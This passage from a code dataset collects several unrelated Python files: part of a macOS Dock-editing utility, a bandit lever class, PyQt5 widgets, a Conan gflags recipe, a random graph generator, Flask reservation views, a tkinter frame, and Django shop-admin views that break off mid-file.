\"\"\"returns guid string\"\"\"\n return subprocess.Popen(['/usr/bin/uuidgen'],stdout=subprocess.PIPE).communicate()[0].rstrip()\n\n\ndef addItem(pl, add_path, replace_label=None, position=None, before_item=None, after_item=None, section='persistent-apps', display_as=1, show_as=1, arrangement=2, tile_type='file-tile',label_name=None):\n \"\"\"adds an item to an existing dock plist object\"\"\"\n if display_as is None:\n display_as = 1\n if show_as is None:\n show_as = 0\n if arrangement is None:\n arrangement = 2\n\n # fix problems with unicode file names\n enc = (sys.stdin.encoding if sys.stdin.encoding else 'utf-8')\n add_path = utils.unicodify(add_path, enc)\n\n # set a dock label if one isn't provided\n if label_name is None:\n if tile_type == 'url-tile':\n label_name = add_path\n section = 'persistent-others'\n else:\n base_name = re.sub('/$', '', add_path).split('/')[-1]\n label_name = re.sub('.app$', '', base_name)\n\n\n # only add if item label isn't already there\n\n if replace_label != label_name:\n for existing_dock_item in (pl[section]):\n for label_key in ['file-label','label']:\n if label_key in existing_dock_item['tile-data']:\n if existing_dock_item['tile-data'][label_key] == label_name:\n print(\"%s already exists in dock. 
Use --replacing '%s' to update an existing item\" % (label_name, label_name))\n return False\n\n\n\n if replace_label is not None:\n for item_offset in range(len(pl[section])):\n tile_replace_candidate = pl[section][item_offset]['tile-data']\n if tile_replace_candidate[label_key_for_tile(tile_replace_candidate)] == replace_label:\n verboseOutput('found', replace_label)\n del pl[section][item_offset]\n position = item_offset + 1\n break\n\n new_guid = generate_guid()\n if tile_type == 'file-tile':\n new_item = {'GUID': new_guid, 'tile-data': {'file-data': {'_CFURLString': add_path, '_CFURLStringType': 0},'file-label': label_name, 'file-type': 32}, 'tile-type': tile_type}\n elif tile_type == 'directory-tile':\n if subprocess.Popen(['/usr/bin/sw_vers', '-productVersion'],\n stdout=subprocess.PIPE).stdout.read().rstrip().split('.')[1] == '4': # gets the decimal after 10 in sw_vers; 10.4 does not use 10.5 options for stacks\n new_item = {'GUID': new_guid, 'tile-data': {'directory': 1, 'file-data': {'_CFURLString': add_path, '_CFURLStringType': 0}, 'file-label': label_name, 'file-type': 2 }, 'tile-type': tile_type}\n else:\n new_item = {'GUID': new_guid, 'tile-data': {'arrangement': arrangement, 'directory': 1, 'display_as': display_as, 'file-data': {'_CFURLString': add_path, '_CFURLStringType': 0}, 'file-label': label_name, 'file-type': 2, 'show_as': show_as}, 'tile-type': tile_type}\n\n elif tile_type == 'url-tile':\n new_item = {'GUID': new_guid, 'tile-data': {'label': label_name, 'url': {'_CFURLString': add_path, '_CFURLStringType': 15}}, 'tile-type': tile_type}\n else:\n print('unknown type:', tile_type)\n return False\n\n verboseOutput('adding', new_item)\n\n if position is not None:\n if position in [ 'beginning', 'begin', 'first' ]:\n pl[section].insert(0, new_item)\n return True\n elif position in [ 'end', 'last' ]:\n pl[section].append(new_item)\n return True\n elif position in [ 'middle', 'center' ]:\n midpoint = int(len(pl[section])/2)\n pl[section].insert(midpoint, new_item)\n return True\n else:\n try:\n int(position)\n except Exception:\n print('Invalid position', position)\n return False\n if int(position) == 0:\n pl[section].insert(int(position), new_item)\n elif int(position) > 0:\n pl[section].insert(int(position)-1, new_item)\n else:\n pl[section].insert(int(position)+len(pl[section])+1, new_item)\n return True\n elif after_item is not None or before_item is not None:\n for item_offset in range(len(pl[section])):\n try:\n if after_item is not None:\n if pl[section][item_offset]['tile-data']['file-label'] == after_item:\n pl[section].insert(item_offset+1, new_item)\n return True\n if before_item is not None:\n if pl[section][item_offset]['tile-data']['file-label'] == before_item:\n pl[section].insert(item_offset, new_item)\n return True\n except KeyError:\n pass\n pl[section].append(new_item)\n verboseOutput('item added at end')\n return True\n\n\ndef removeItem(pl, item_name):\n removal_succeeded = False\n if item_name == \"all\":\n verboseOutput('Removing all items')\n pl['persistent-apps'] = []\n pl['persistent-others'] = []\n return True\n for dock_item in pl['persistent-apps']:\n if dock_item['tile-data'].get('file-label') == item_name:\n verboseOutput('found', item_name)\n pl['persistent-apps'].remove(dock_item)\n removal_succeeded = True\n for dock_item in pl['persistent-others']:\n if dock_item['tile-type'] == \"url-tile\":\n if dock_item['tile-data'].get('label') == item_name:\n verboseOutput('found', item_name)\n pl['persistent-others'].remove(dock_item)\n 
removal_succeeded = True\n        else:\n            if dock_item['tile-data'].get('file-label') == item_name:\n                verboseOutput('found', item_name)\n                pl['persistent-others'].remove(dock_item)\n                removal_succeeded = True\n    return removal_succeeded\n\n\ndef restart_the_dock():\n    os.system('/usr/bin/killall -HUP Dock >/dev/null 2>&1')\n\n\ndef commitPlist(pl, plist_path, restart_dock):\n    writePlist(pl, plist_path)\n    if restart_dock:\n        restart_the_dock()\n#def commitPlistLegacy(pl, plist_path, restart_dock):\n#    plist_string_path = path_as_string(plist_path)\n#    pl = removeLongs(pl)\n#    plist_stat = os.stat(plist_string_path)\n#    writePlist(pl, plist_path)\n#    convertPlist(plist_path, 'binary1')\n#    os.chown(plist_string_path, plist_stat.st_uid, plist_stat.st_gid)\n#    os.chmod(plist_string_path, plist_stat.st_mode)\n#    if restart_dock:\n#        os.system('/usr/bin/killall -HUP cfprefsd >/dev/null 2>&1')\n#        os.system('/usr/bin/killall -HUP Dock >/dev/null 2>&1')\n#\n\n\ndef label_key_for_tile(item):\n    for label_key in ['file-label','label']:\n        if label_key in item:\n            return label_key\n\n\ndef main():\n    retVal = dock_util(sys.argv[1:])\n    sys.exit(retVal)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"wavesaudio/instl","sub_path":"utils/dockutil.py","file_name":"dockutil.py","file_ext":"py","file_size_in_byte":29720,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"9302734826","text":"import random\n\nclass Levers():\n\tdef __init__(self, n) -> None:\n\t\tself.levers = []\n\t\tself.picks = []\n\t\tfor _ in range(0, n):\n\t\t\tself.levers.append(random.uniform(0, 1))\n\t\t\tself.picks.append(0)\n\t\tself.n = n\n\n\tdef get_levers(self):\n\t\treturn self.levers\n\t\n\tdef pick_lever(self, choice):\n\t\tnew_random_number = random.uniform(0, 1)\n\t\tif new_random_number <= self.levers[choice]:\n\t\t\treturn 1\n\t\treturn 0\n","repo_name":"dorinm17/connect_four_statistics","sub_path":"part3/levers.py","file_name":"levers.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22781157428","text":"import os\n\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtGui import QFont, QColor\nfrom PyQt5.QtWidgets import QWidget, QLabel, QHBoxLayout, QFrame, QVBoxLayout\n\nfrom PhotoViewer import PhotoViewer\nfrom models import Teacher\n\n\nclass TeacherInfoWidget(QWidget):\n    def __init__(self, teacher: Teacher, size, parent=None):\n        super().__init__(parent)\n        self.__size = size\n\n        self.photo_viewer = PhotoViewer(os.path.join('teacher_info', teacher.photo_path), size)\n\n        vlayout = QVBoxLayout()\n\n        self.name = QLabel('<b>' + teacher.name + '</b>')\n        self.name.setFont(QFont('Ubuntu Mono', size * 0.11))\n        self.name.setAlignment(QtCore.Qt.AlignCenter)\n        vlayout.addWidget(self.name)\n        vlayout.addSpacerItem(\n            QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding))\n\n        layout = QHBoxLayout()\n\n        layout.addSpacerItem(\n            QtWidgets.QSpacerItem(40, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding))\n        layout.addWidget(self.photo_viewer)\n        layout.addSpacerItem(\n            QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding))\n        layout.addLayout(self._get_info_layout(teacher, size))\n        layout.addSpacerItem(\n            QtWidgets.QSpacerItem(40, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding))\n\n        vlayout.addLayout(layout)\n\n        vlayout.addSpacerItem(\n            QtWidgets.QSpacerItem(20, 40, 
QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding))\n\n        p = self.palette()\n        p.setColor(self.backgroundRole(), QColor(250, 205, 140))\n\n        self.setPalette(p)\n\n        container = QWidget(self)\n        container.setLayout(vlayout)\n\n        frame = QFrame(container)\n        frame.setStyleSheet(\"border-style: outset; border-width: 6px; border-radius: 10px; border-color: #732125;\")\n\n        container.show()\n        frame.setFixedSize(container.size())\n\n    def _get_info_layout(self, teacher: Teacher, size):\n        self.facts_viewer = QLabel(teacher.fact)\n        self.facts_viewer.setWordWrap(True)\n        self.facts_viewer.setFont(QFont('Ubuntu Mono', size * 0.06))\n        self.facts_viewer.setAlignment(QtCore.Qt.AlignCenter)\n\n        self.subjects_viewer = QLabel('Предметы:<br>' + \"<br>
\".join(teacher.subjects))\n self.subjects_viewer.setFont(QFont('Ubuntu Mono', size * 0.06))\n self.subjects_viewer.setAlignment(QtCore.Qt.AlignCenter)\n\n layout = QVBoxLayout()\n\n layout.addWidget(self.facts_viewer)\n layout.addWidget(self.subjects_viewer)\n\n return layout\n\n","repo_name":"rkhapov/pk","sub_path":"TeacherInfoWidget.py","file_name":"TeacherInfoWidget.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35891047322","text":"from PyQt5.QtCore import Qt\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\n\nfrom .button import PictureButtonFlat\n\n\nclass NotepadDashboardToolbar(QtWidgets.QFrame):\n newNoteAction = QtCore.pyqtSignal(object)\n importNoteAction = QtCore.pyqtSignal(object)\n newGroupAction = QtCore.pyqtSignal(object)\n\n def __init__(self):\n super(NotepadDashboardToolbar, self).__init__()\n\n self.setLayout(QtWidgets.QHBoxLayout())\n self.layout().setContentsMargins(0, 0, 0, 0)\n self.layout().setAlignment(Qt.AlignCenter)\n\n self.note = PictureButtonFlat(QtGui.QIcon(\"icons/note\"))\n self.note.clicked.connect(self.newNoteAction.emit)\n self.note.setText(' New Note')\n self.layout().addWidget(self.note)\n\n self.group = PictureButtonFlat(QtGui.QIcon(\"icons/book\"))\n self.group.clicked.connect(self.newGroupAction.emit)\n self.group.setText(' New Group')\n self.layout().addWidget(self.group)\n\n self.importing = PictureButtonFlat(QtGui.QIcon(\"icons/import\"))\n self.importing.clicked.connect(self.importNoteAction.emit)\n self.importing.setText(' Import Note')\n self.layout().addWidget(self.importing)\n\n shortcut = QtWidgets.QShortcut(QtGui.QKeySequence(\"Ctrl+n\"), self.note)\n shortcut.activatedAmbiguously.connect(lambda x=None: self.newNoteAction.emit(self.note))\n shortcut.activated.connect(lambda x=None: self.newNoteAction.emit(self.note))\n shortcut.setEnabled(True)\n\n shortcut = QtWidgets.QShortcut(QtGui.QKeySequence(\"Ctrl+g\"), self.group)\n shortcut.activatedAmbiguously.connect(lambda x=None: self.newGroupAction.emit(self.group))\n shortcut.activated.connect(lambda x=None: self.newGroupAction.emit(self.group))\n shortcut.setEnabled(True)\n\n shortcut = QtWidgets.QShortcut(QtGui.QKeySequence(\"Ctrl+i\"), self.importing)\n shortcut.activatedAmbiguously.connect(lambda x=None: self.importNoteAction.emit(self.importing))\n shortcut.activated.connect(lambda x=None: self.importNoteAction.emit(self.importing))\n shortcut.setEnabled(True)\n\n self.progress = QtWidgets.QProgressBar(self)\n self.progress.setVisible(False)\n self.layout().addWidget(self.progress)\n\n def setProgress(self, value=None):\n if value in [None, 0, 100]:\n self.progress.setVisible(False)\n self.note.setVisible(True)\n self.importing.setVisible(True)\n self.group.setVisible(True)\n return self\n\n self.progress.setVisible(True)\n self.progress.setValue(value)\n self.note.setVisible(False)\n self.importing.setVisible(False)\n self.group.setVisible(False)\n return self\n\n def close(self):\n super(NotepadDashboardToolbar, self).deleteLater()\n return super(NotepadDashboardToolbar, self).close()\n","repo_name":"AlexWoroschilow/AOD-Notes","sub_path":"src/modules/window_notepad_dashboard/gui/bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26925828658","text":"import math\nimport numpy\nimport random\n\n\nclass 
GenGraphException(Exception):\n pass\n\n\ndef _calc_fill_pos(nodes, idx):\n total_cnt = (nodes/2) * (nodes-1)\n if idx >= total_cnt:\n raise GenGraphException(\"Index out of node count\")\n d2 = math.floor((-1 + math.sqrt(1 + 8 * idx)) / 2)\n return int(idx - (d2+1)/2*d2), d2+1\n\n\ndef _rand_connect(edges, adj_mat, directed=False):\n if adj_mat.ndim != 2 or adj_mat.shape[0] != adj_mat.shape[1]:\n raise GenGraphException(\"Invalid adj_mat shape\")\n\n nodes = adj_mat.shape[0]\n all_possible_edges_cnt = int(nodes * (nodes-1))\n if not directed:\n undirected_possible_edges_cnt = all_possible_edges_cnt\n else:\n undirected_possible_edges_cnt = all_possible_edges_cnt // 2\n print(\"Matrix shape: %s\" % (adj_mat.shape,))\n print(\"Asking for %d random edges; Maximum possible edges: %d\" % (edges, all_possible_edges_cnt))\n edges = min(all_possible_edges_cnt, edges)\n fill_indices = random.sample(range(all_possible_edges_cnt), edges)\n for connection in fill_indices:\n if directed:\n if connection >= undirected_possible_edges_cnt:\n connection = connection-undirected_possible_edges_cnt\n d2, d1 = _calc_fill_pos(nodes, connection)\n else:\n d1, d2 = _calc_fill_pos(nodes, connection)\n adj_mat[d1][d2] = 1\n else:\n d1, d2 = _calc_fill_pos(nodes, connection)\n adj_mat[d1][d2] = 1\n adj_mat[d2][d1] = 1\n print(\"Result: \\n%s\" % adj_mat)\n return adj_mat\n\n\ndef gen_graph(nrange, erange, directed=True):\n nodes = random.randint(nrange[0], nrange[1])\n edges = random.randint(erange[0], erange[1])\n adj_mat = numpy.zeros((nodes, nodes), dtype=numpy.int8)\n _rand_connect(edges, adj_mat, directed=directed)\n return (nodes, adj_mat)\n","repo_name":"y-usuzumi/tf-explore","sub_path":"random_adjacency_matrix/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"573647278","text":"import json\nfrom flask import render_template, redirect, url_for, abort, flash, request\nfrom flask_login import login_required, current_user\nfrom . import main\nfrom .forms import NameForm, EditProfileForm, EditProfileAdminForm\nfrom .. 
import db\nfrom ..models import Role, User, ReserveInfo\nfrom ..decorators import admin_required\n\n\n@main.route('/')\n@login_required\ndef index():\n    return render_template('index.html')\n\n# fetch the reservation data\n@main.route('/main/total_data', methods=[\"GET\", \"POST\"])\n@login_required\ndef total_data():\n    rows = [{\n        'date': '2018-08-30',\n        '08:30--09:30':'北海市工业园区管委会',\n        '09:30--10:30':'市委组织部',\n        '10:30--11:30':'市委办公室',\n        '14:30--15:30':'涉密载体销毁中心',\n        '15:30--16:30':'北海市国家保密局',\n        '16:30--17:30':'市纪委',\n    }]\n    result = json.dumps(rows)\n    return result\n\n# decide from the reservation ID whether the reservation info may be fetched\n@main.route('/main/get_reserve_info_flag_by_id', methods=[\"GET\", \"POST\"])\n@login_required\ndef get_reserve_info_flag_by_id():\n    data_dict = request.get_json()  # get the data posted by the front end (JSON format)\n    rows = {'flag': 'fail'}  # flag marks whether the details may be fetched; defaults to fail (not allowed)\n\n    print('------------------------------------------')\n    print(data_dict)\n    print('------------------------------------------')\n\n    if current_user.is_moderator() or current_user.is_administrator():  # administrators and moderators may\n        rows['flag'] = 'success'\n    else:\n        reserve_info = ReserveInfo.query.get_or_404(int(data_dict['reserve_id']))\n        print('------------------------------------------')\n        print(data_dict)\n        print(reserve_info.user_id)\n        print(current_user.id)\n        print('------------------------------------------')\n        if reserve_info.user_id == current_user.id:  # if the current user is the one who made the reservation\n            rows['flag'] = 'success'\n    \n    result = json.dumps(rows)\n    return result\n\n# fetch the reservation info by its ID\n@main.route('/main/get_reserve_info_by_id/<int:reserve_id>')\n@login_required\ndef get_reserve_info_by_id(reserve_id):\n    reserve_info = ReserveInfo.query.get_or_404(reserve_id)\n    return render_template(\"main/reserve_info.html\", reserve_info=reserve_info)\n\n\n# profile page route\n@main.route('/user/<username>')\n@login_required\ndef user(username):\n    user = User.query.filter_by(username=username).first_or_404()\n    return render_template('main/user.html', user=user)\n\n# ordinary users and moderators edit their own account info\n@main.route('/edit_profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n    form = EditProfileForm()\n    if form.validate_on_submit():\n        current_user.department = form.department.data\n        current_user.location = form.location.data\n        current_user.remarks = form.remarks.data\n        db.session.add(current_user._get_current_object())  # get the User object via _get_current_object()\n        db.session.commit()\n        flash('Your account information has been updated!')\n        return redirect(url_for('.user', username=current_user.username))\n    form.department.data = current_user.department\n    form.location.data = current_user.location\n    form.remarks.data = current_user.remarks\n    return render_template('main/edit_profile.html', form=form)\n\n# administrators edit account info\n@main.route('/edit_profile/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_profile_admin(id):\n    user = User.query.get_or_404(id)\n    form = EditProfileAdminForm(user=user)\n    if form.validate_on_submit():\n        user.email = form.email.data\n        user.username = form.username.data\n        user.confirmed = form.confirmed.data\n        user.role = Role.query.get(form.role.data)\n        user.department = form.department.data\n        user.location = form.location.data\n        user.remarks = form.remarks.data\n        db.session.add(user)\n        db.session.commit()\n        flash('Your account information has been updated!')\n        return redirect(url_for('.user', username=user.username))\n    form.email.data = user.email\n    form.username.data = user.username\n    form.confirmed.data = user.confirmed\n    form.role.data = user.role_id\n    form.department.data = user.department\n    form.location.data = user.location\n    form.remarks.data = user.remarks\n    return 
render_template('main/edit_profile.html', form=form, user=user)","repo_name":"YaJunCui/bhbmjsfwzx","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26343935928","text":"import tkinter as tk\nfrom muvimaker import main_logger\nfrom .sound_files_frame import SoundFilesFrame\nfrom .picture_frame import PicturesFrame\n\n\nlogger = main_logger.getChild(__name__)\n\n\nclass InfoFrame(tk.Frame):\n\n def __init__(self, parent):\n tk.Frame.__init__(self, parent.master)\n self.parent = parent\n self.master = parent\n self.sound_files_frame = None\n self.pictures_frame = None\n self._setup_widgets()\n self.columnconfigure((0, 1), weight=1)\n self.rowconfigure(0, weight=1)\n\n def _setup_widgets(self):\n sound_files_frame = SoundFilesFrame(self)\n sound_files_frame.grid(row=0, column=0, sticky='nsew')\n self.sound_files_frame = sound_files_frame\n\n pictures_frame = PicturesFrame(self)\n pictures_frame.grid(row=0, column=1, sticky='nsew')\n self.pictures_frame = pictures_frame\n\n # audio_file_label = tk.Label(self, text='Sound File: ')\n # audio_file_label.grid(row=0, column=0)\n # audio_filename_label = tk.Label(self, textvariable=self.parent.soundfile)\n # audio_filename_label.grid(row=0, column=1)\n #\n # video_file_label = tk.Label(self, text='Video Output File: ')\n # video_file_label.grid(row=1, column=0)\n # video_filename_label = tk.Label(self, textvariable=self.parent.videofile)\n # video_filename_label.grid(row=1, column=1)","repo_name":"JannisNe/muvimaker","sub_path":"muvimaker/editor/frames/info_frame/info_frame.py","file_name":"info_frame.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31942216095","text":"from conan import ConanFile\nfrom conan.tools.cmake import CMake, CMakeToolchain, cmake_layout\nfrom conan.tools.files import collect_libs, copy, get, rmdir, save\nimport os\nimport textwrap\n\nrequired_conan_version = \">=1.53.0\"\n\n\nclass GflagsConan(ConanFile):\n name = \"gflags\"\n description = \"The gflags package contains a C++ library that implements commandline flags processing\"\n topics = (\"cli\", \"flags\", \"commandline\")\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/gflags/gflags\"\n license = \"BSD-3-Clause\"\n\n package_type = \"library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"nothreads\": [True, False],\n \"namespace\": [\"ANY\"],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n \"nothreads\": True,\n \"namespace\": \"gflags\",\n }\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n self.options.rm_safe(\"fPIC\")\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n def generate(self):\n tc = CMakeToolchain(self)\n tc.variables[\"BUILD_SHARED_LIBS\"] = self.options.shared\n tc.variables[\"BUILD_STATIC_LIBS\"] = not self.options.shared\n tc.variables[\"BUILD_gflags_LIB\"] = not self.options.nothreads\n tc.variables[\"BUILD_gflags_nothreads_LIB\"] = self.options.nothreads\n tc.variables[\"BUILD_PACKAGING\"] = False\n tc.variables[\"BUILD_TESTING\"] = 
False\n tc.variables[\"INSTALL_HEADERS\"] = True\n tc.variables[\"INSTALL_SHARED_LIBS\"] = self.options.shared\n tc.variables[\"INSTALL_STATIC_LIBS\"] = not self.options.shared\n tc.variables[\"REGISTER_BUILD_DIR\"] = False\n tc.variables[\"REGISTER_INSTALL_PREFIX\"] = False\n tc.variables[\"GFLAGS_NAMESPACE\"] = self.options.namespace\n tc.generate()\n\n def build(self):\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def package(self):\n copy(self, \"COPYING.txt\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n cmake = CMake(self)\n cmake.install()\n rmdir(self, os.path.join(self.package_folder, \"lib\", \"pkgconfig\"))\n rmdir(self, os.path.join(self.package_folder, \"lib\", \"cmake\"))\n\n # TODO: to remove in conan v2 once legacy generators removed\n self._create_cmake_module_alias_targets(\n os.path.join(self.package_folder, self._module_file_rel_path),\n {\"gflags\": \"gflags::gflags\"}\n )\n\n def _create_cmake_module_alias_targets(self, module_file, targets):\n content = \"\"\n for alias, aliased in targets.items():\n content += textwrap.dedent(f\"\"\"\\\n if(TARGET {aliased} AND NOT TARGET {alias})\n add_library({alias} INTERFACE IMPORTED)\n set_property(TARGET {alias} PROPERTY INTERFACE_LINK_LIBRARIES {aliased})\n endif()\n \"\"\")\n save(self, module_file, content)\n\n @property\n def _module_file_rel_path(self):\n return os.path.join(\"lib\", \"cmake\", f\"conan-official-{self.name}-targets.cmake\")\n\n def package_info(self):\n self.cpp_info.set_property(\"cmake_file_name\", \"gflags\")\n self.cpp_info.set_property(\"cmake_target_name\", \"gflags::gflags\")\n self.cpp_info.set_property(\"cmake_target_aliases\", [\"gflags\"])\n self.cpp_info.set_property(\"pkg_config_name\", \"gflags\")\n self.cpp_info.libs = collect_libs(self)\n if self.settings.os == \"Windows\":\n self.cpp_info.system_libs.extend([\"shlwapi\"])\n elif self.settings.os in [\"Linux\", \"FreeBSD\"]:\n self.cpp_info.system_libs.extend([\"pthread\", \"m\"])\n\n # TODO: to remove in conan v2 once legacy generators removed\n self.cpp_info.build_modules[\"cmake_find_package\"] = [self._module_file_rel_path]\n self.cpp_info.build_modules[\"cmake_find_package_multi\"] = [self._module_file_rel_path]\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/gflags/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"2586937315","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.views.decorators.cache import never_cache\nfrom django.contrib.auth.decorators import login_required\nfrom home.models import CustomUser,product,product_category,product_description,product_image,user_order,discount_coupen,order_list\nfrom django.views import View\nfrom django.http.response import JsonResponse\nfrom django.core import serializers\nfrom datetime import date, timedelta\nfrom django.db.models import Sum, Count\nimport json\nfrom django.http import FileResponse, HttpResponse\n\n# for pdf generation\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.units import inch\nfrom reportlab.lib.pagesizes import letter\nimport io\nimport csv\n\nfrom django.contrib.auth.decorators import user_passes_test\n\n# Create your views here.\n\n\ndef cycloneadmin_login(request):\n\n # check if the user is already logedin\n if 
request.user.is_authenticated:\n return redirect(\"dashboard\")\n\n # if the request is post fetch data\n if request.method == \"POST\":\n email = request.POST[\"email\"]\n password = request.POST[\"password\"]\n user = authenticate(email = email,password = password)\n \n # check the user is a valied admin\n if user is not None and user.is_superuser:\n login(request,user)\n return redirect(\"dashboard\")\n else:\n messages.info(request,\"Admin user not found or incorrect password\")\n # if method is get\n return render(request,'cycloneadmin_login.html')\n\ndef cycloneadmin_logout(request):\n logout(request)\n return redirect(\"login\")\n\n\n\nclass cycloneadmin_dashboard(View):\n\n\n def get(self,request):\n user_count = CustomUser.objects.filter(is_superuser = False).count() \n sales_today = user_order.objects.filter(order_date = date.today()).count()\n total_shipment = user_order.objects.count()\n total_revenue = user_order.objects.all().aggregate(Sum(\"payment_amount\"))['payment_amount__sum']\n category_sales = order_list.objects.values('category_id__product_id__bike_type').annotate(Count('category_id__product_id__bike_type'))\n day_sale = order_list.objects.values('order_no__order_date').annotate(item_sum = Sum('order_quantity'))\n total_revenue_status = user_order.objects.values('order_date').annotate(date_total_revenue = Sum('payment_amount'))\n\n dashboard_data = {\"user_count\":user_count,\"sales_today\":sales_today,\"total_shipment\":total_shipment,\"total_revenue\":total_revenue,\"category_sales\":category_sales,\"day_sale\":day_sale,\"total_revenue_status\":total_revenue_status}\n \n \n return render(request,'cycloneadmin_dashboard.html',dashboard_data)\n\n\n\n# user information \ndef cycloneadmin_userinfo(request):\n return render(request,'cycloneadmin_userinfo.html',{\"data\":CustomUser.objects.filter(is_superuser=False)})\n\n\n# unbload or bloak user\nclass cycloneadmin_edituseracces(View):\n\n def post(self,request):\n email = request.POST['email']\n user = CustomUser.objects.get(email = email)\n if user.is_active:\n user.is_active = False\n else:\n user.is_active = True\n user.save()\n return JsonResponse({'status':'200','message':user.is_active})\n\n\ndef cycloneadmin_sellerinfo(request):\n return render(request,'cycloneadmin_sellerinfo.html')\n\n\n# products view\ndef cycloneadmin_products(request):\n \n # fetching info from data base\n products = product.objects.values(\"product_id\",\"company\",\"model\",\"bike_type\")\n\n return render(request,'cycloneadmin_products.html',{\"products\":products})\n\n\ndef cycloneadmin_category(request):\n # fetching data from database to list out categories\n # product and product_catogories are joined to fetch the data\n \n categories = product_category.objects.values(\"product_id__company\",\"product_id__model\",\"frame_size\",\"break_type\",\"color\",\"is_discontinued\",\"quantity\",\"id\")\n \n return render(request,'cycloneadmin_category.html',{\"categories\":categories})\n\n\n\ndef cycloneadmin_addcategory(request):\n \n if request.method == \"POST\":\n\n product_imgs = request.FILES.getlist('product_imgs[]')\n \n \n # find the record using this info\n company = request.POST['company']\n model = request.POST['model']\n\n # update record\n frame_size = request.POST['frame_size']\n color = request.POST['color']\n break_type = request.POST['break_type']\n gear_type = request.POST['gear_type']\n mrp = request.POST['mrp']\n seller_price = request.POST['seller_price']\n quantity = request.POST['quantity']\n is_discounted = 
request.POST['is_discounted']\n \n \n # update all the information , not a good practce\n # only update changed fields using ajax\n try: \n product_id = product.objects.get(model = model, company = company)\n new_category = product_category(product_id = product_id,frame_size = frame_size,color = color, break_type = break_type, gear_type = gear_type, mrp = mrp ,seller_price = seller_price, quantity = quantity, is_discounted = is_discounted) \n new_category.save() \n\n # iteratively update all pictures in data base from picture list\n for image in product_imgs:\n new_image = product_image(category_id = new_category, product_image = image) \n new_image.save()\n \n except product.DoesNotExist:\n messages.info(request,\"such product does not exist\")\n return redirect(\"addcategory\")\n \n messages.info(request,\"new category successfully added\") \n return redirect(\"addcategory\")\n\n products = product.objects.values('company','model')\n return render(request,'cycloneadmin_addcategory.html',{'products':products})\n\n\n\nclass cycloneadmin_editcategory(View):\n\n def get(self,request,category_id):\n\n productcat = product_category.objects.get(id = category_id)\n print(productcat.is_discounted)\n return render(request,'cycloneadmin_editcategory.html',{\"productcat\":productcat})\n\n def post(self,request,category_id):\n \n # fetch pictures from the backend\n current_imgs = request.FILES.getlist('current_imgs[]')\n \n # fetch other fields\n frame_size = request.POST['frame_size']\n color = request.POST['color']\n break_type = request.POST['break_type']\n gear_type = request.POST['gear_type']\n mrp = request.POST['mrp']\n seller_price = request.POST['seller_price']\n quantity = request.POST['quantity']\n is_discounted = request.POST['is_discounted']\n\n \n # update all the information , not a good practce\n # only update changed fields using ajax\n try:\n update_product = product_category.objects.get(id = category_id) \n \n update_product.frame_size = frame_size\n update_product.color = color\n update_product.break_type = break_type\n update_product.gear_type = gear_type\n update_product.mrp = mrp\n update_product.seller_price = seller_price\n update_product.quantity = quantity\n update_product.is_discounted = is_discounted\n \n update_product.save()\n # iteratively update all pictures in data base from picture list\n for image in current_imgs:\n new_image = product_image(category_id = update_product, product_image = image) \n new_image.save() \n messages.info(request,\"product updated successfully\")\n except Exception as e:\n print(e)\n messages.info(request,\"such product does not exist\")\n return redirect(\"addcategory\") \n \n return redirect(\"category\")\n\n\n# product continue / discontinue\nclass cycloneadmin_delete_category(View):\n\n def get(self, request):\n \n category_id = request.GET['category_id']\n\n # fetch product object\n discontinue_product = product_category.objects.get(id = category_id)\n \n # if product is available set to true / discontinue\n if discontinue_product.is_discontinued == False:\n discontinue_product.is_discontinued = True\n discontinue_product.save()\n return JsonResponse({'status':200,'message':'category discontinued'})\n # else set to false / continue\n else:\n discontinue_product.is_discontinued = False\n discontinue_product.save()\n return JsonResponse({'status':200,'message':'category back to available'})\n\n\n\ndef cycloneadmin_orders(request):\n\n orders = 